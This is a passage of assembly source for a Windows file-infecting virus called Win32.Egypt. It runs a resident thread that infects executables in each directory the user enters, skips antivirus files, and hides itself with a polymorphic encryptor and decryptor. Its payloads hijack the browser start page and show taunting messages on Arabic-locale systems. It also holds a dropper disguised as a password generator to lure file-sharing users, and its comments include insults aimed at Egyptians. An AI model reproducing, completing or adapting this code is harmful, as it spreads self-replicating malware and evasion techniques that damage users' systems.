        lodsb
        xor     al,cl
        mov     cl,ch
        mov     ch,dl
        mov     dl,dh
        mov     dh,8
NextBitCRC:
        shr     bx,1
        rcr     ax,1
        jnc     NoCRC
        xor     ax,08320h
        xor     bx,0EDB8h
NoCRC:  dec     dh
        jnz     NextBitCRC
        xor     ecx,eax
        xor     edx,ebx
        dec     edi                    
        jnz     NextByteCRC
        not     edx
        not     ecx
        mov     eax,edx
        rol     eax,16
        mov     ax,cx
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This is the virus resident part, it will detect directory
; change every 8 seconds and infect all files in the new one
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

VThread:
        call    get_delta           
get_delta:                          
        pop     ebp                 
        sub     ebp,offset get_delta

@loophere:
        mov     eax,[ori_eip+ebp]     
        mov     [tmp_eip+ebp],eax     
        call    InfectCurrentDirectory
        mov     eax,[tmp_eip+ebp]     
        mov     [ori_eip+ebp],eax     

@sleepagain:
        push    8000
        call    [ebp+_Sleep]

        push    ebp                     
        mov     eax,ebp
        add     eax,offset currdir
        push    eax        
        push    L 128
        call    [_GetCurrentDirectoryA+ebp]
        pop     ebp                     

        mov     esi,ebp
        mov     edi,esi
        add     esi,offset currdir
        add     edi,offset olddir
        xor     ecx,ecx
        mov     cl,128
        rep     cmpsb
        je      @sleepagain
        mov     esi,ebp
        mov     edi,esi
        add     esi,offset currdir
        add     edi,offset olddir
        xor     ecx,ecx
        mov     cl,128
        rep     movsb
        jmp     @loophere
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This will launch the virus resident part 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

LaunchVirusMainThread:
        pushad
        lea     ebx,[ebp+offset ThreadID3]
        push    ebx
        push    4h   
        push    0h
        lea     ebx,[ebp+offset VThread]
        push    ebx
        push    0h
        push    0h
        call    [ebp+_CreateThread]
        or      eax,eax
        je      @noway
        push    eax

        push    -1h                                             ;low priority
        push    eax
        call    [ebp+_SetThreadPriority]

        call    [ebp+_ResumeThread]
@noway:
        popad
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infect all EXE files in current directory
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

InfectCurrentDirectory:
        push    ebp                    
        mov     eax,offset wfd         
        add     eax,ebp                
        push    eax                    
        mov     eax,offset exe_match   
        add     eax,ebp                
        xor     [eax],"Shit"
        push    eax                    
        call    [_FindFirstFileA+ebp]
        pop     ebp                     

        push    eax
        mov     eax,offset exe_match    
        add     eax,ebp                 
        xor     [eax],"Shit"
        pop     eax

        inc     eax
        or      eax,eax
        je      icd_end
        dec     eax
        mov     [search_handle+ebp],eax 

        mov     edx,offset wfd.cFileName
        add     edx,ebp                 
        call    InfectFile              

fnf_loop:
        push    ebp                     
        mov     eax,offset wfd          
        add     eax,ebp                 
        push    eax                     
        push    [search_handle+ebp]     
        call    [_FindNextFileA+ebp]
        pop     ebp                     
        or      eax,eax
        je      icd_end                 
        mov     edx,offset wfd.cFileName
        add     edx,ebp                 
        call    InfectFile              
        jmp     fnf_loop                
icd_end:
        push    [search_handle+ebp]     
        call    [ebp+_FindClose]
        ret


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infects EXE file pointed to by EDX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
InfectFile:

        push    edx                     ; Don't infect AVs , thanks
        pop     esi                     ; bumblebee ;)
        lea     edi,avStrings+ebp  
        mov     ecx,vStringsCout
testIfAvL:
        push    esi
        mov     ax,word ptr [edi]
testAvLoop:
        cmp     word ptr [esi],ax
        jne     contTestLoop
        pop     esi
        ret    
contTestLoop:
        inc     esi
        cmp     byte ptr [esi+3],0       
        jne     testAvLoop
        pop     esi
        add     edi,2
        loop    testIfAvL

        push    edx
        push    ebp    
        mov     eax,offset wfd          
        add     eax,ebp                 
        push    eax                     
        push    edx                     
        call    [_FindFirstFileA+ebp]
        pop     ebp

        push    eax
        call    [ebp+_FindClose]

        mov     edx, [ebp+wfd.dwFileAttributes]
        test    edx, 800h                              ; Avoid compressed
        je      conttt                                 ; files
        pop     edx
        ret
conttt:                 

        test    edx,4h
        je      contttt
        pop     edx
        ret
contttt:
        pop     edx
        mov     esi,edx
        mov     edi,ebp
        add     edi,offset wfd.cFileName
@morecopy:
        lodsb
        stosb
        cmp     al,0
        jne     @morecopy

        lea     esi,[ebp+wfd.cFileName]        
        push    80h
        push    edx
        apicall _SetFileAttributesA            

        call    OpenFile                       

        cmp_    eax,CantOpen

        mov     dword ptr [ebp+FileHandle],eax

        mov     ecx,dword ptr [ebp+wfd.nFileSizeLow] 
        call    CreateMap                      
        cmp_    eax,CloseFile

        mov     dword ptr [ebp+MapHandle],eax

        mov     ecx,dword ptr [ebp+wfd.nFileSizeLow] 
        call    MapFile                        
        cmp_    eax,UnMapFile

        mov     dword ptr [ebp+MapAddress],eax

        mov     esi,eax                        

        mov     esi,[esi+3Ch]
        add     esi,eax
        mov     ecx,dword ptr [esi];           
        xor     cx,"7f"
        cmp     cx,"EP"xor"7f"
        jnz     NoInfect
        test    word ptr [esi+16h],2000h                ; Don't infect dlls
        jnz     NoInfect

        cmp     dword ptr [esi+mark],012345678h     ; Was it infected?
        jz      NoInfect

        push    dword ptr [esi+3Ch]

        push    dword ptr [ebp+MapAddress]      
        apicall _UnmapViewOfFile

        push    dword ptr [ebp+MapHandle]
        apicall _CloseHandle

        pop     ecx

        mov     eax,dword ptr [ebp+wfd.nFileSizeLow] 
        add     eax,[ebp+viruslen]

        call    Align
        xchg    ecx,eax

        call    CreateMap
        cmp_    eax,CloseFile

        mov     dword ptr [ebp+MapHandle],eax

        mov     ecx,dword ptr [ebp+NewSize]
        call    MapFile
        cmp_    eax,UnMapFile

        mov     dword ptr [ebp+MapAddress],eax

; I would like to thank billy for the PE infection algorithm

        mov     esi,eax

        mov     esi,[esi+3Ch]
        add     esi,eax

        mov     edi,esi

        movzx   eax,word ptr [edi+06h]
        dec     eax
        imul    eax,eax,28h
        add     esi,eax
        add     esi,78h
        mov     edx,[edi+74h]
        shl     edx,3
        add     esi,edx

        mov     eax,[edi+28h]
        mov     dword ptr [ebp+ori_eip],eax
        
        mov     edx,[esi+10h]
        mov     ebx,edx
        add     edx,[esi+14h]

        push    edx

        mov     eax,ebx

        add     eax,[esi+0Ch]
        mov     [edi+28h],eax
        mov     dword ptr [ebp+NewEIP],eax

        mov     eax,[esi+10h]
        add     eax,[ebp+viruslen]
        mov     ecx,[edi+3Ch]
        call    Align

        mov     [esi+10h],eax
        mov     [esi+08h],eax

        pop     edx

        mov     eax,[esi+10h]
        add     eax,[esi+0Ch]
        mov     [edi+50h],eax

        or      dword ptr [esi+24h],section_flags
        mov     dword ptr [edi+mark],012345678h

        lea     esi,[ebp+code_start]
        xchg    edi,edx
        add     edi,dword ptr [ebp+MapAddress]
        mov     [ebp+fromhere], edi
        mov     ecx, enc-code_start ; code_len
        rep     movsb

no_null_key:
        call    random32
        cmp     al,0ffh
        je      no_null_key                                 ; Avoid 0 keys
        cmp     ah,068h
        je      no_null_key
        mov     byte ptr[ebp+key2],al
        xor     byte ptr[ebp+key2],0ffh
        mov     bl,al
        mov     byte ptr [ebp+key],ah
        xor     byte ptr [ebp+key],068h
        mov     ecx,enc_end-enc
@enc_loop:
        lodsb
        sub     al,bl
        neg     al
        ror     al,1
        not     al
        neg     al
        xor     al,ah
        stosb
        dec     ecx
        or      ecx,ecx
        jne     @enc_loop

        mov     ecx,code_end-enc_end
        rep     movsb
        pushad
        mov     edi,[ebp+fromhere]
        add     edi,poly_enc-code_start
        mov     ecx,((poly_end-poly_enc)/4)+1
        mov     eax,dword ptr[ebp+keyy]
polyenc_loop:
        xor     dword ptr [edi],eax
        add     edi,4h
        dec     ecx
        cmp     ecx,0h
        jne     polyenc_loop
        popad
        mov     ecx,[ebp+dec_len]
        mov     esi,[ebp+decplace]
        rep     movsb                   ; now copy the poly decryptor

        jmp     UnMapFile

NoInfect:
        dec     byte ptr [ebp+infections]
        mov     ecx,dword ptr [ebp+wfd.nFileSizeLow]
        call    TruncFile

UnMapFile:
        push    dword ptr [ebp+MapAddress]
        apicall _UnmapViewOfFile

CloseMap:
        push    dword ptr [ebp+MapHandle]
        apicall _CloseHandle

CloseFile:
        mov     eax,ebp
        add     eax,offset wfd.ftCreationTime
        push    eax
        add     eax,8
        push    eax
        add     eax,8
        push    eax
        push    dword ptr [ebp+FileHandle]
        apicall _SetFileTime

        push    dword ptr [ebp+FileHandle]
        apicall _CloseHandle

CantOpen:
        push    dword ptr [ebp+wfd.dwFileAttributes]
        lea     eax,[ebp+wfd.cFileName]
        push    eax
        apicall _SetFileAttributesA
        ret
Align:           
        push    edx
        xor     edx,edx
        push    eax
        div     ecx
        pop     eax
        sub     ecx,edx
        add     eax,ecx
        pop     edx
        ret

TruncFile:
        xor     eax,eax
        push    eax
        push    eax
        push    ecx
        push    dword ptr [ebp+FileHandle]
        apicall _SetFilePointer

        push    dword ptr [ebp+FileHandle]
        apicall _SetEndOfFile
        ret

OpenFile:
        xor     eax,eax
        push    eax
        push    eax
        push    00000003h
        push    eax
        inc     eax
        push    eax
        push    80000000h or 40000000h
        push    edx ;esi
        apicall _CreateFileA
        ret

CreateMap:
        xor     eax,eax
        push    eax
        push    ecx
        push    eax
        push    00000004h
        push    eax
        push    dword ptr [ebp+FileHandle]
        apicall _CreateFileMappingA
        ret

MapFile:
        xor     eax,eax
        push    ecx
        push    eax
        push    eax
        push    00000002h
        push    dword ptr [ebp+MapHandle]
        apicall _MapViewOfFile
        ret

;;;;;;;;;;;;;;;;;
; Get System Time
;;;;;;;;;;;;;;;;;
VxGetSystemTime:
        push    ebp             
        mov     eax,offset st   
        add     eax,ebp         
        push    eax             
        call    [_GetSystemTime+ebp]
        pop     ebp                     
        ret                             

;;;;;;;;;;;;;;;;;;
; Get ModuleHandle 
;;;;;;;;;;;;;;;;;;
VxGetModuleHandle:
        push    ebp              
        push    eax              
        call    [_GetModuleHandleA+ebp] 
        pop     ebp               
        ret                       

;;;;;;;;;;;;;;;;;
; Get ProcAddress
;;;;;;;;;;;;;;;;;
VxGetProcAddress:
        push    ebp   
        push    edx   
        push    eax   
        call    [_GetProcAddress+ebp]
        pop     ebp                    
        ret                            

payload:
        call    [ebp+_GetSystemDefaultLCID]
        and     eax, 0FFFFh
        cmp     eax, 0c01h                                ; Arabic (egypt) ?
        je      arabic_payload
        call    VxGetSystemTime
        cmp     word ptr [ebp+wDayOfWeek], 5                    ; friday
        jnz     @@Endp    
        cmp     word ptr [ebp+wDay], 7   
        jbe     @@DoPayload              
        cmp     word ptr [ebp+wDay], 14  
        jbe     @@Endp
        cmp     word ptr [ebp+wDay], 21  
        ja      @@Endp           
@@DoPayload:
        lea     eax, [ebp+HandleOpenedKey]
        push    eax
        push    000F003Fh
        push    0
        lea     eax, [ebp+IExplorerKey]
        push    eax
        push    HKEY_CURRENT_USER
        call    dword ptr [ebp+_RegOpenKeyExA]
        or      eax, eax  
        jnz     @@Endp    
        push    pagesize  
        lea     eax, [ebp+page] 
        push    eax
        push    1             
        push    0
        lea     eax, [ebp+IExplorerValue] 
        push    eax                       
        push    dword ptr [ebp+HandleOpenedKey] 
        call    dword ptr [ebp+_RegSetValueExA] 

        push    dword ptr [ebp+HandleOpenedKey]
        call    dword ptr [ebp+_RegCloseKey] ; Close key handle
@@Endp:
        ret

arabic_payload:
        mov     eax,100
        call    rndeax
        cmp     eax,3                          ; a 4% probability of msg
        jbe     doit
        ret
doit:
        mov     eax,((offset offsets_end-offsets)/4)-1
        call    rndeax
        shl     eax,2
        add     eax,ebp
        add     eax,offset offsets

        push    MB_ICONEXCLAMATION      
        mov     ebx,ebp
        add     ebx,offset delta
        push    ebx   
        mov     eax, dword ptr [eax]     
        add     eax,ebp
        push    eax
        push    L 0                     
        call    [_MessageBoxA+ebp]  
        ret


;;;;;;;;;;;;;;;;;;;;;;;;; 
;Random Number generators
;;;;;;;;;;;;;;;;;;;;;;;;;
rndeax:
        push    edx               
        push    ecx
        xor     edx,edx
        push    eax               
        call    random32          
        pop     ecx                
        div     ecx                
        xchg    eax, edx           
        pop     ecx                 
        pop     edx                 
        ret

irandom32:
        call    VxGetSystemTime       
        mov     ax,word ptr [st.wMilliseconds +ebp]
        shl     eax,8
        mov     dword ptr [ebp+lastrnd],eax
        ret

random32:
        push    ecx                           
        xor     ecx, ecx                       
        mov     eax, dword ptr [ebp+lastrnd]      
        mov     cx, 33                         
                                          
rloop:                                    
        add     eax, eax                       
        jnc     $+4                            
        xor     al, 197                        
        loop    rloop                         
        mov     dword ptr [ebp+lastrnd], eax     
        pop     ecx                            
        ret                                

lastrnd dd      0h

;;;;;;;;;;;;
; Data stuff
;;;;;;;;;;;;
a32_string              db      "ADVAPI32.dll",0
regopen_string          db      "RegOpenKeyExA",0
regget_string           db      "RegQueryValueExA",0
close_string            db      "RegCloseKey",0
Regset                  db      "RegSetValueExA",0
u32_string              db      "USER32.dll",0
msgbox_string           db      "MessageBoxA",0

part2   db      "\shell\open\command",0
part2_len equ $-offset part2

prog_itself db  "Applications\"        
prog_buffer db 100h dup (0)            

desktop    db "\Desktop",0


fileee db "BaNGBUS RaNDOM PASSWORD GENERATOR.EXE",0
; Could you have resisted such a file on kazaa ? ;) 

avStrings       dw      'VA','NA','RD','DI','DO','BT','-F'
vStringsCout    equ     (offset $-offset avStrings)/2

page            db      'http://www.touregypt.net',0

; Yeah , Come and visit egypt, beautiful country with asshole people ;-)

pagesize equ   $ - offset page

IExplorerKey    db      'Software\Microsoft\Internet Explorer\Main',0
IExplorerValue  db      'Start Page',0

lnk_match  db "*.LNK",0
exe_match  dd "XE.*" xor "Shit"   ; *.EXE
                db "E",0


kernel32                dd      0BFF70000h
@@NamezCRC32            label   byte
@FindFirstFileA         dd      0AE17EBEFh
@FindNextFileA          dd      0AA700106h
@FindClose              dd      0C200BE21h
@CreateFileA            dd      08C892DDFh
@DeleteFileA            dd      0DE256FDEh
@SetFilePointer         dd      085859D42h
@SetFileAttributesA     dd      03C19E536h
@CloseHandle            dd      068624A9Dh
@GetCurrentDirectoryA   dd      0EBC6C18Bh
@SetCurrentDirectoryA   dd      0B2DBD7DCh
@GetWindowsDirectoryA   dd      0FE248274h
@GetSystemDirectoryA    dd      0593AE7CEh
@CreateFileMappingA     dd      096B2D96Ch
@MapViewOfFile          dd      0797B49ECh
@UnmapViewOfFile        dd      094524B42h
@SetEndOfFile           dd      059994ED6h
@GetProcAddress         dd      0FFC97C1Fh
@LoadLibraryA           dd      04134D1ADh
@GetSystemTime          dd      075B7EBE8h
@GetModuleHandleA       dd      082b618d4h
@WriteFile              dd      021777793h
@GetFileSize            dd      0ef7d811bh
@GetFileAttributesA     dd      0c633d3deh
@VirtualAlloc           dd      04402890eh
@Sleep                  dd      00ac136bah
@CreateThread           dd      019f33607h
@SetThreadPriority      dd      01e533f17h
@ResumeThread           dd      06087961bh
@lstrcmp                dd      06ae4253bh
@lstrcpy                dd      0afd8ae51h
@GetSystemDefaultLCID   dd      04b410542h
@SetFileTime            dd      04B2A3E7Dh
                        db      0BBh
offsets:
dd offset @1
dd offset @2
dd offset @3
dd offset @4
dd offset @5
dd offset @6
dd offset @7
dd offset @8
dd offset @9
dd offset @10
dd offset @11
dd offset @12
dd offset @13
dd offset @14
dd offset @15
dd offset @16
dd offset @17
dd offset @18
dd offset @19
dd offset @20
offsets_end:

; Funny messages in arabic for the arabic payload
; you will not probably find them funny at all but they
; make sense in arabic ;)

@1 db "������� �� �� ���� ",0
; Is he speaking english , Morsi ?
@2 db "���� �� ���Ϳ  ",0
; Did you aim at it , smartie ?
@3 db "! ��� ��� ���� ����",0
; It's all because i have a one hair !
@4 db "������ � �� ���� �",0
; Who is it ? Mr Lotfi?! I can't believe it !
@5 db "! ������ �� ����� ���� ��� ���� � ���� �� ��� �� ���� ���",0
; Please Tafida, you know that i love you so much, but i don't
; support your mother !
@6 db "� ����� ���� �� ���� � ��� ����� ��� ������",0
; What's up with you Hamdi ? i already told you i am engaged
@7 db "! �� ������ �� ���� ��� �� �����",0
; Don't Cry your heart out, Tahani !
@8 db "��� ���� ������ ���� ������ �� �� ���",0
; How do you dare talk to me in such a manner, kid ?
@9 db "���� ��� ���� � ������ ��� ������",0
; String on string and thread on thread
@10 db "! ����� �����, ���� ����",0
; Give me my liberty, free my hands !
@11 db "! � �������",0
; El-Lembii 
@12 db "! �� �� ���� , ��� ��� ���",0
; No Bouha, you can do everything but this !
@13 db "! �� ����� ������ �������",0
; Oh, you sexy smelling butter boxes !
@14 db "���� ������ ���� ��� ����� �����",0
; Gamal el dawly calls for resolving the football federation 
@15 db "���� ������ ���� ������� �������� ������ ������ ",0
; Gamal el dawly threatens Israel with the nuclear weapon !
@16 db "���� ���� ����� ���� ",0
; If El ahly is iron, zamalek would melt it !
@17 db "! ����� �� ����, ���� �� ��� �������",0
; Please mohsen, if daddy finds out about it he will cut us into peaces !
@18 db "! �� ���, �� ����� ���� ���� ��� �������... ��� ��� ������",0
; Son, it's your time to know the truth, you were born by artificial
; fertilization !
@19 db "� ����� ������ ��� ���� ��� �� ������ �� �",0
; UGH ! who is knocking in such an hour ?
@20 db "! �� ��� ������ ����� ��� ���� ����",0
; Come on! I told you i am in need of sleep 


advapi32                dd      ?
_RegSetValueExA         dd      ?
_RegOpenKeyExA          dd      ?
_RegQueryValueExA       dd      ?
_RegCloseKey            dd      ?
HandleOpenedKey         dd      0
val2 db 0,0

buff_ dd 60h
buff db 60h dup (0)

buff2_ dd 30h 
buff2 db 30h dup (0)

haddress dd ?
hmap     dd ?
hfile    dd ?
ThreadID3 dd ?

olddir          db      128     dup     (0h)
currdir         db      128     dup     (1h)     

st              SYSTEMTIME      ?
wfd             WIN32_FIND_DATA         ?
search_handle   dd      ?
search_handle2  dd      ?

ori_attrib      dd      ?
infect_counter  dd      ?

haddress2  dd ?
hmap2      dd ?
hfile2     dd ?
user32     dd ?
_MessageBoxA            dd      ?
itd_va                  dd      ?
fsize_high              dd      ?
new_filesize            dd      ?
file_handle             dd      ?
map_handle              dd      ?
map_address             dd      ?
pe_header               dd      ?
last_entry              dd      ?
file_align              dd      ?
tmp_eip                 dd      ?
size_rawdata            dd      ?

kernel                  dd      kernel_
infections              dd      00000000h
NewSize                 dd      00000000h
SearchHandle            dd      00000000h
FileHandle              dd      00000000h
MapHandle               dd      00000000h
MapAddress              dd      00000000h
AddressTableVA          dd      00000000h
NameTableVA             dd      00000000h
OrdinalTableVA          dd      00000000h
Counter                 dw      0000h

@@Offsetz               label   byte
_FindFirstFileA         dd      00000000h
_FindNextFileA          dd      00000000h
_FindClose              dd      00000000h
_CreateFileA            dd      00000000h
_DeleteFileA            dd      00000000h
_SetFilePointer         dd      00000000h
_SetFileAttributesA     dd      00000000h
_CloseHandle            dd      00000000h
_GetCurrentDirectoryA   dd      00000000h
_SetCurrentDirectoryA   dd      00000000h
_GetWindowsDirectoryA   dd      00000000h
_GetSystemDirectoryA    dd      00000000h
_CreateFileMappingA     dd      00000000h
_MapViewOfFile          dd      00000000h
_UnmapViewOfFile        dd      00000000h
_SetEndOfFile           dd      00000000h
_GetProcAddress         dd      00000000h
_LoadLibraryA           dd      00000000h
_GetSystemTime          dd      00000000h
_GetModuleHandleA       dd      00000000h
_WriteFile              dd      00000000h
_GetFileSize            dd      00000000h
_GetFileAttributesA     dd      00000000h
_VirtualAlloc           dd      00000000h
_Sleep                  dd      00000000h
_CreateThread           dd      00000000h
_SetThreadPriority      dd      00000000h
_ResumeThread           dd      00000000h
_lstrcmp                dd      00000000h
_lstrcpy                dd      00000000h
_GetSystemDefaultLCID   dd      00000000h
_SetFileTime            dd      00000000h


; This is a compressed exe file, it will display a faked username
; and password for bangbus when run, included is it's assembly

dropstart:
db	�04Dh, 05Ah, 050h, 000h, 001h, 000h, 002h, 000h
db	�003h, 000h, 004h, 000h, 001h, 000h, 00Fh, 000h
db	�001h, 000h, 0FFh, 0FFh, 000h, 002h, 000h, 0B8h
db	�000h, 007h, 000h, 040h, 000h, 001h, 000h, 01Ah
db	�000h, 022h, 000h, 001h, 000h, 002h, 000h, 0BAh
db	�010h, 000h, 001h, 000h, 00Eh, 01Fh, 0B4h, 009h
db	�0CDh, 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 090h
db	�090h, 054h, 068h, 069h, 073h, 020h, 070h, 072h
db	�06Fh, 067h, 072h, 061h, 06Dh, 020h, 06Dh, 075h
db	�073h, 074h, 020h, 062h, 065h, 020h, 072h, 075h
db	�06Eh, 020h, 075h, 06Eh, 064h, 065h, 072h, 020h
db	�057h, 069h, 06Eh, 033h, 032h, 00Dh, 00Ah, 024h
db	�037h, 000h, 088h, 000h, 050h, 045h, 000h, 002h
db	�000h, 04Ch, 001h, 004h, 000h, 001h, 000h, 0F8h
db	�032h, 078h, 08Dh, 000h, 008h, 000h, 0E0h, 000h
db	�001h, 000h, 08Eh, 081h, 00Bh, 001h, 002h, 019h
db	�000h, 001h, 000h, 002h, 000h, 003h, 000h, 006h
db	�000h, 007h, 000h, 010h, 000h, 003h, 000h, 010h
db	�000h, 003h, 000h, 020h, 000h, 004h, 000h, 040h
db	�000h, 002h, 000h, 010h, 000h, 003h, 000h, 002h
db	�000h, 002h, 000h, 001h, 000h, 007h, 000h, 003h
db	�000h, 001h, 000h, 00Ah, 000h, 006h, 000h, 050h
db	�000h, 003h, 000h, 004h, 000h, 006h, 000h, 002h
db	�000h, 005h, 000h, 010h, 000h, 002h, 000h, 020h
db	�000h, 004h, 000h, 010h, 000h, 002h, 000h, 010h
db	�000h, 006h, 000h, 010h, 000h, 00Ch, 000h, 030h
db	�000h, 002h, 000h, 0ACh, 000h, 01Ch, 000h, 040h
db	�000h, 002h, 000h, 014h, 000h, 053h, 000h, 043h
db	�04Fh, 044h, 045h, 000h, 005h, 000h, 010h, 000h
db	�003h, 000h, 010h, 000h, 003h, 000h, 002h, 000h
db	�003h, 000h, 006h, 000h, 00Eh, 000h, 020h, 000h
db	�002h, 000h, 0E0h, 044h, 041h, 054h, 041h, 000h
db	�005h, 000h, 010h, 000h, 003h, 000h, 020h, 000h
db	�003h, 000h, 002h, 000h, 003h, 000h, 008h, 000h
db	�00Eh, 000h, 040h, 000h, 002h, 000h, 0C0h, 02Eh
db	�069h, 064h, 061h, 074h, 061h, 000h, 003h, 000h
db	�010h, 000h, 003h, 000h, 030h, 000h, 003h, 000h
db	�002h, 000h, 003h, 000h, 00Ah, 000h, 00Eh, 000h
db	�040h, 000h, 002h, 000h, 0C0h, 02Eh, 072h, 065h
db	�06Ch, 06Fh, 063h, 000h, 003h, 000h, 010h, 000h
db	�003h, 000h, 040h, 000h, 003h, 000h, 002h, 000h
db	�003h, 000h, 00Ch, 000h, 00Eh, 000h, 040h, 000h
db	�002h, 000h, 050h, 000h, 068h, 003h, 06Ah, 030h
db	�068h, 000h, 001h, 000h, 020h, 040h, 000h, 001h
db	�000h, 068h, 02Ah, 020h, 040h, 000h, 001h, 000h
db	�06Ah, 000h, 001h, 000h, 0E8h, 013h, 000h, 003h
db	�000h, 06Ah, 000h, 001h, 000h, 0E8h, 006h, 000h
db	�003h, 000h, 0FFh, 025h, 050h, 030h, 040h, 000h
db	�001h, 000h, 0FFh, 025h, 054h, 030h, 040h, 000h
db	�001h, 000h, 0FFh, 025h, 05Ch, 030h, 040h, 000h
db	�0D5h, 001h, 042h, 041h, 04Eh, 047h, 042h, 055h
db	�053h, 020h, 052h, 041h, 04Eh, 044h, 04Fh, 04Dh
db	�020h, 050h, 041h, 053h, 053h, 057h, 04Fh, 052h
db	�044h, 020h, 047h, 045h, 04Eh, 045h, 052h, 041h
db	�054h, 04Fh, 052h, 020h, 062h, 079h, 020h, 061h
db	�06Bh, 032h, 038h, 000h, 001h, 000h, 055h, 073h
db	�065h, 072h, 06Eh, 061h, 06Dh, 065h, 020h, 03Ah
db	�020h, 06Bh, 06Bh, 06Eh, 06Dh, 079h, 079h, 067h
db	�040h, 079h, 061h, 068h, 06Fh, 06Fh, 02Eh, 063h
db	�06Fh, 06Dh, 00Ah, 050h, 061h, 073h, 073h, 077h
db	�06Fh, 072h, 064h, 020h, 03Ah, 020h, 067h, 06Bh
db	�034h, 030h, 078h, 078h, 035h, 000h, 0A7h, 001h
db	�03Ch, 030h, 000h, 00Ah, 000h, 064h, 030h, 000h
db	�002h, 000h, 050h, 030h, 000h, 002h, 000h, 048h
db	�030h, 000h, 00Ah, 000h, 071h, 030h, 000h, 002h
db	�000h, 05Ch, 030h, 000h, 016h, 000h, 07Ch, 030h
db	�000h, 002h, 000h, 090h, 030h, 000h, 006h, 000h
db	�09Eh, 030h, 000h, 006h, 000h, 07Ch, 030h, 000h
db	�002h, 000h, 090h, 030h, 000h, 006h, 000h, 09Eh
db	�030h, 000h, 006h, 000h, 04Bh, 045h, 052h, 04Eh
db	�045h, 04Ch, 033h, 032h, 02Eh, 064h, 06Ch, 06Ch
db	�000h, 001h, 000h, 055h, 053h, 045h, 052h, 033h
db	�032h, 02Eh, 064h, 06Ch, 06Ch, 000h, 003h, 000h
db	�047h, 065h, 074h, 04Dh, 06Fh, 064h, 075h, 06Ch
db	�065h, 048h, 061h, 06Eh, 064h, 06Ch, 065h, 041h
db	�000h, 004h, 000h, 045h, 078h, 069h, 074h, 050h
db	�072h, 06Fh, 063h, 065h, 073h, 073h, 000h, 003h
db	�000h, 04Dh, 065h, 073h, 073h, 061h, 067h, 065h
db	�042h, 06Fh, 078h, 041h, 000h, 056h, 001h, 010h
db	�000h, 002h, 000h, 014h, 000h, 003h, 000h, 003h
db	�030h, 008h, 030h, 01Ch, 030h, 022h, 030h, 028h
db	�030h, 000h, 0EEh, 003h
dropend:
enc_end:

;.386p
;.model flat,stdcall
;extrn ExitProcess:proc
;extrn GetModuleHandleA:proc
;extrn MessageBoxA:proc
;.data
;mb_caption db "BANGBUS RANDOM PASSWORD GENERATOR by ak28",0
;mb_text db "Username : kknmyyg@yahoo.com",10
;        db "Password : gk40xx5",0
;.code
;start:
;
;       push    00000030h                                  ; Display
;       push    offset mb_caption                          ; faked msgbox
;       push    offset mb_text        
;       push    0                   
;       call    MessageBoxA           
;
;       push    0                                          ; End
;       call    ExitProcess
;end start
;end
;

; 8 Bit decryptor

decrypt:
        pop     esi
        push    esi
        cmp     esi,offset enc
        je      nodec
        xor     ecx,ecx
        mov     al,00h
key     equ     $-1
        mov     ah,00h
key2    equ     $-1
        xor     ebx,ebx
        push    dword ptr fs:[ebx]   ; Here is the trick , i get the 
        pop     ebx                  ; default SEH address and use
        xor     al,bl  ;068h         ; it to get the keys to decryption.
        xor     ah,bh  ;0ffh          

dec_loop:
        xor     byte ptr [esi],al              ; six 8-bits instructions 
        neg     byte ptr [esi]                 ; on every byte of the 
        not     byte ptr [esi]                 ; virus
        rol     byte ptr [esi],1      
        neg     byte ptr [esi]        
        add     byte ptr [esi],ah     

        inc     esi
        inc     ecx
        cmp     ecx,enc_end-enc
        jne     dec_loop
nodec:
        ret
poly_end:
nop
nop
nop
nop
code_end:
poly_dec:
pop eax
pushad
pushfd
push eax
ret

;;;;;;;;;;;;;;;;
; Generation one
;;;;;;;;;;;;;;;;
g1_quit:
        push    00000030h               
        push    offset mb_caption       
        push    offset mb_text          
        push    L 0                     
        call    MessageBoxA             ; Display the message box

        push    L 0                     
        call    ExitProcess             ; Exit to OS

mb_caption      db      "Win32.Egypt v 1.5 ",0
mb_text         db      "Win32.Egypt has invaded the system",10
                db      "This is a 1st generation host",0

ends
end code_start